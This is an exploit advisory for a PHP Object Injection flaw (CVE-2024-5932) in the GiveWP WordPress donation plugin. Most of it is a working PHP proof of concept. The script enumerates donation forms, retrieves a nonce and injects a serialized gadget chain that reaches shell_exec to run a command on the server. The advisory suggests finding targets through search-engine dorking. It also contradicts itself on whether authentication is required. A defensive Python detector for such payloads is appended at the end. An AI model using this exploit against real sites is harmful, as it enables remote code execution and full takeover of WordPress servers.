This flaw stemmed from insecure deserialization of user-supplied data. Authenticated users, even with low-privilege roles like subscriber, could craft malicious serialized PHP objects.
When processed, these objects could trigger arbitrary PHP code execution (Remote Code Execution or RCE). RCE allows attackers to fully compromise the affected WordPress site, including data theft, defacement, or complete takeover.
Users were strongly urged to update immediately to version 3.14.2 or higher, which patched the flaw.
=============================================================================================================================================
| # Title : GiveWP Donation 3.14.1 PHP Object Injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://givewp.com |
=============================================================================================================================================
POC :
[+] Dorking on Google or other search engines.
[+] Code Description: This PHP script demonstrates a proof-of-concept exploit for a PHP Object Injection vulnerability in the WordPress plugin GiveWP.
What the script does:
Sends AJAX requests to the WordPress admin-ajax.php endpoint using cURL.
Enumerates donation forms by calling the give_form_search action.
Selects a random form and retrieves its required nonce/hash via give_donation_form_nonce.
Builds a malicious serialized PHP payload that abuses unsafe object deserialization chains within GiveWP and its dependencies.
Injects the payload into a donation request parameter (give_title).
Triggers deserialization during donation processing (give_process_donation), aiming to execute a system command (e.g., whoami) via a gadget chain that reaches shell_exec.
Outputs the server response, which may contain command execution results if the target is vulnerable.
Impact:
Successful exploitation can lead to remote code execution (RCE) on the vulnerable WordPress server.
The attack requires no authentication if the affected AJAX actions are exposed.
Related: https://packetstorm.news/files/id/180463/ (CVE-2024-5932).
[+] Payload :
[+] Set Target : line 17
[+] Usage : php poc.php
[+] PayLoad :
<?php
// Proof of concept for the PHP Object Injection in the GiveWP WordPress plugin (see description above)
function send_request($url, $data) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}

$target = "http://victim-site.com"; // Target site URL

// Enumerate the available donation forms (give_form_search)
$form_list = send_request("$target/wp-admin/admin-ajax.php", "action=give_form_search");
$form_list = json_decode($form_list, true);
if (empty($form_list)) {
    die("No donation forms found.");
}

// Pick a random form
$selected_form = $form_list[array_rand($form_list)];
$form_id = $selected_form['id'];

// Retrieve the form's nonce/hash (give_donation_form_nonce)
$form_data = send_request("$target/wp-admin/admin-ajax.php", "action=give_donation_form_nonce&give_form_id=$form_id");
$form_data = json_decode($form_data, true);
if (!isset($form_data['data'])) {
    die("Could not retrieve the form nonce.");
}
$form_hash = $form_data['data'];

// Build the serialized payload
$payload = 'O:19:"Stripe\\StripeObject":1:{s:10:"\0*\0_values";a:1:{s:3:"foo";' .
    'O:62:"Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData":1:{' .
    's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\0*\0container";' .
    'O:33:"Give\\Vendors\\Faker\\ValidGenerator":3:{s:12:"\0*\0validator";' .
    's:10:"shell_exec";s:12:"\0*\0generator";' .
    'O:34:"Give\\Onboarding\\SettingsRepository":1:{' .
    's:11:"\0*\0settings";a:1:{s:8:"address1";s:'.strlen('whoami').':"whoami";}}' .
    's:13:"\0*\0maxRetries";i:10;}}}}}}';

// Send the donation request (give_process_donation) with the payload in give_title
$data = http_build_query([
    'give-form-id'   => $form_id,
    'give-form-hash' => $form_hash,
    'give-price-id'  => '0',
    'give-amount'    => '$10.00',
    'give_first'     => 'John',
    'give_last'      => 'Doe',
    'give_email'     => 'EMAIL_PLACEHOLDER', // value truncated in the original listing; placeholder
    'give_title'     => $payload,
    'give-gateway'   => 'offline',
    'action'         => 'give_process_donation'
]);
$response = send_request("$target/wp-admin/admin-ajax.php", $data);
echo "Response: \n$response\n";
?>
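As an added defensive example (not part of this advisory), the following Python check flags give_process_donation POST bodies to admin-ajax.php that carry a serialized PHP object in any donation field, and raises severity when the class names match the chain shown above. It assumes the request path and urlencoded body are available from a web server log or WAF hook; the sample bodies are constructed and the "suspicious" one is only a structurally truncated object header, not a working payload.

```python
import re
from urllib.parse import parse_qs, urlencode

# Header of a serialized PHP object: O:<len>:"<Class>":<props>:{
PHP_OBJECT_RE = re.compile(r'O:\d+:"([A-Za-z0-9_\\]+)":\d+:\{')

# Class names from the gadget chain in the advisory above. Any serialized
# object in a donation field is already suspicious; these raise the severity.
KNOWN_GADGET_CLASSES = {
    "Stripe\\StripeObject",
    "Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData",
    "Give\\Vendors\\Faker\\ValidGenerator",
    "Give\\Onboarding\\SettingsRepository",
}


def php_serialized_classes(value):
    """Return the class names of every serialized PHP object header in a string."""
    return PHP_OBJECT_RE.findall(value)


def inspect_donation_request(path, body):
    """Inspect one POST (path + urlencoded body). Returns None for clean traffic,
    otherwise a finding for the first parameter carrying a serialized object."""
    if not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [""])[0] != "give_process_donation":
        return None
    for name, values in params.items():
        for value in values:
            classes = php_serialized_classes(value)
            if classes:
                known = sorted(set(classes) & KNOWN_GADGET_CLASSES)
                return {"param": name, "classes": classes,
                        "known_gadgets": known,
                        "severity": "high" if known else "medium"}
    return None


# Constructed sample bodies (not real traffic); the second one carries only a
# truncated object header, enough to exercise the detector.
SAMPLE_BENIGN_BODY = urlencode({"action": "give_process_donation",
                                "give-form-id": "12", "give_title": "Mr"})
SAMPLE_SUSPICIOUS_BODY = urlencode({
    "action": "give_process_donation", "give-form-id": "12",
    "give_title": 'O:19:"Stripe\\StripeObject":1:{s:3:"foo";'
                  'O:33:"Give\\Vendors\\Faker\\ValidGenerator":0:{}}'})
```

A generic `O:<n>:"…"` match still fires for chains built from other classes, so the "medium" finding is the one worth alerting on; the class list only prioritises.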
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================